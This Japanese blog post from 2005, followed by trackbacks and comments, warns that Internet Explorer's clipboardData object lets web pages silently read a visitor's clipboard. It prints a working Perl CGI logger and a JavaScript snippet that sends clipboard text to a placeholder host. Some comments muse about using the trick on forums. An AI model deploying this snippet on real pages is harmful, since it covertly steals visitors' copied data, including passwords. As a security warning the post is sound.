« 焼肉は良い | メイン | ハンバーグを食べた »

2005年11月23日

あなたのクリップボードが盗まれる

スクリプトによる貼り付け許可

IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操作ができるのだ。clipboardData というオブジェクトね。操作できる内容は、クリップボードにデータを読み込むこと(setData)、読み出すこと(getData)、消去すること(clearData)の3種類。

読み出すことも可能なんですよね。しかも、デフォルトでは、警告すら出ない。

以下のような、プログラムを準備しよう。

#!/usr/bin/perl

use strict;

my $file = '/tmp/cb.txt';

open (CB, ">> $file");
print CB "$ENV{'QUERY_STRING'}\n";
close (CB);

print "Status: 301 Moved Permanently\n";
print "Location: http://host/img/pixel.gif\n\n";

exit;

何の変哲も無い。CGI に渡される QUERY STRING をテキストファイルに保存していくだけだ(? 以降ね)。エラーが出ないように、画像ファイルにリダイレクトもするけど。このプログラムを cb.cgi として、以下のように HTML に貼り付けると…

<script language="JavaScript">
<!--
document.write('<img src="http://host/cb.cgi?'+clipboardData.getData("Text")+'">');
// -->
</script>

そのページを訪れた人のクリップボードの内容を、どんどん cb.txt に保存していくことができます。大半の IE ユーザーは、気づきもしません。いやー。危険だなぁ。

JavaScript などを無効にすると、ウェブページの楽しさの半分しか満喫できない。と思っているので、設定は「既定のレベル」にしていたのだけど「スクリプトによる貼り付け処理の許可」は、「ダイアログに表示する」の設定に変えた。

ちなみに Firefox では、オブジェクトすら無いのでクリップボードが盗まれることはありません(他のオブジェクトを調べてないからよくしらん)。 Windows の IE 限定のオブジェクトっぽいですね。

結構有名な話かもしれませんが、昨日知ったので、わざわざエントリーにしてみました。

clipboardData は、人様の情報を横取りするために準備されたオブジェクトではないと思うので、もっと有用な方法を考えないとね。それこそ web 2.0 ですよ。良く知らんけど。

危険危険といわれても、具体例がないと実感がわきませんよね。そういう具体例でした。入力間違いが無いようにパスワードを コピー&ペースト しなさい。とよく言われるかもしれませんが、盗まれてたかもしれませんねー。

2005年11月23日 18:45 | Technology

トラックバック

このリストは、次のエントリーを参照しています: あなたのクリップボードが盗まれる:

» [IT]あなたのクリップボードが盗まれる - Ceekz Logs from ヘビースモーカーの特撮喫煙所
ふわぁ、そうなんだ。 何かもうIEってこれだから…。 IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操... [続きを読む]

トラックバック時刻: 2005年11月24日 10:31

» [雑談] 貴方のクリップボードが狙われている? from 雑記帳
Ceekz Logsさんのエントリー(11/23)によると、IEにおいてクリップボードの内容が気づかぬうちに盗まれる事があるそうです。 先ほど自分でテストコード... [続きを読む]

トラックバック時刻: 2005年11月25日 11:59

» Ctrl+C その後に from ほぼ日刊 サボリーマンの明日はどっちだ?
Ceekz Logs 『あなたのクリップボードが盗まれる』 コピー操作や切り取り操作を行ったときのデータは一時的にクリップボードというメモリ上の領域に一時的... [続きを読む]

トラックバック時刻: 2005年11月25日 17:04

» [PCメモ] クリップボード盗聴 from odenの裏日記
Ceekz Logs(2005/11/23)より。 IEをデフォルトの状態で使っていると、クリップボードの中身が抜き取られてしまう可能性があるそうです。 早速... [続きを読む]

トラックバック時刻: 2005年11月25日 17:06

» まじか! from Another Life's Flavor
あなたのクリップボードが盗まれる IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操作ができるのだ。cli... [続きを読む]

トラックバック時刻: 2005年11月26日 13:47

» IE経由でクリップボードが操作される from 林檎の歌
きんぎょ日記: 徹夜危険。 こちらを見ていたら。 あなたのクリップボードが盗まれる - Ceekz Logs WindowsはIE経由でクリップボードの操... [続きを読む]

トラックバック時刻: 2005年11月26日 21:15

» あなたのクリップボードが盗まれる from ごぶりんの独り言3
インターネットエクスプローラを使っていると クリップボードの内容が簡単に覗かれるという件 これは簡単なスクリプトによって web閲覧者のクリップボード... [続きを読む]

トラックバック時刻: 2005年11月27日 17:02

» ○リップ○ードの中身が丸見えwwww from ☆レティクル超特急☆
IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操作ができるのだ。clipboardData というオブジ... [続きを読む]

トラックバック時刻: 2005年11月27日 17:13

» IEのセキュリティ設定に気を付けろぉー from ぶっちゃけ露骨にグリコーゲン略してブログ
今日ブログ見てたら、面白いことが書いてありました。 パソコンを使っている人は間違いなく使っているコピー&ペースト、文章やら時にはパスワードとかにも 使い... [続きを読む]

トラックバック時刻: 2005年11月27日 18:15

» クリップボードの内容が盗まれる!? from 悪七兵衛景清の今日の一言
 けっこうパスワードとかクリップボードに一旦コピーしてから貼り付けって人いるだろ [続きを読む]

トラックバック時刻: 2005年11月28日 00:10

» あなたのクリップボードが盗まれる? from Kei's Home Page -3rd Season-
Ceekz Logs より。 クリップボードの除法を読み取る方法あるとか。 何気... [続きを読む]

トラックバック時刻: 2005年11月28日 03:18

» Diary/2005-11-28 from SilkyColor (PukiWiki/TrackBack 0.3)
Get your clipboard! † 「あなたのクリップボードが盗まれる; Ceekz Logs」 パスワードなんかは要注意ですねぇ。 一... [続きを読む]

トラックバック時刻: 2005年11月28日 22:15

» IEからスクリプトでクリップボードをとる from blog.tokyoace4.com
ceek.jp : あなたのクリップボードが盗まれる この問題。 怖いのやら、こわくないのやら。 そんでもってそれから、これ。... [続きを読む]

トラックバック時刻: 2005年11月29日 05:35

» [ウェブ] あなたのクリップボードが盗まれる from ilittakaの日記
参照:[http://private.ceek.jp/archives/001639.html:title]  これはヤバイ。特にRSSフィードの表題と... [続きを読む]

トラックバック時刻: 2005年11月30日 04:02

» クリップボードが盗まれる であります! from 司令部日誌
 IE使ってるとクリップボードの内容が盗まれる事があるらしい・・・。  今日知っ [続きを読む]

トラックバック時刻: 2005年11月30日 18:32

» クリップボードの盗聴 from 日記、雑記
2年くらいまえ、自作して知らない掲示板に貼り付けてスクリプト暗号化して転送してみたことあるかな。お遊びで。。自分でもかなり悪趣味だとおもったからすぐやめたけど、... [続きを読む]

トラックバック時刻: 2005年12月01日 23:41

» あらぬところで個人情報が漏れてないか? from 雪傘
これで、パスワードや名前等の個人情報が表示されたら要注意です。 続きは[この記事の続きを読む] よりどうぞ。 ※アラート拒否、JSオフ、... [続きを読む]

トラックバック時刻: 2006年10月13日 01:07

» 入力支援☆クリップボード履歴 from 我が道を示せ
コピーした内容の履歴を保存し、再利用を可能とするツールでございます。 [続きを読む]

トラックバック時刻: 2008年04月19日 23:06

コメント

危険ですね。
随分前から問題としてはあったみたいですが、私も今まで知りませんでした。
ttp://java-house.jp/~takagi/security/misc/jscript-clipboard/test.html

投稿者 影武者 : 2005年11月24日 11:09

>> 影武者 さん
実に4年前から問題は指摘されていたようですね。
Ajax が注目され JavaScript が見直されてきた今日こそ、使われ方によっては危険ということを知ってもらいたいと思っています。

投稿者 ceekz : 2005年11月24日 18:59

かなり前から、アクセスするだけでクリップボードの内容をIP付きで自動的に貼り付けてしまう掲示板がありました。
掲示板をコピペで荒らす人を誘い出して釣ってた思い出があります。

投稿者 774 : 2005年11月29日 17:01

>> 774 さん
うまく使えば、入力の必要の無い掲示板が出来ますね。面白くないですけど。
2ちゃんねるで同様のことをすれば、面白いかもしれないと思ってしまいました。

投稿者 ceekz : 2005年11月30日 04:21

何ヵ最近顔文字とヵ
少なくなってきたと思った。
最初ゎ気のせいヵとずっと思っていました。
でも
気のせいでゎありませnでした。
誰ヵに取られてしまぃ
ホントに最悪です
文字も全て取られました。

投稿者 あはは : 2006年10月15日 14:43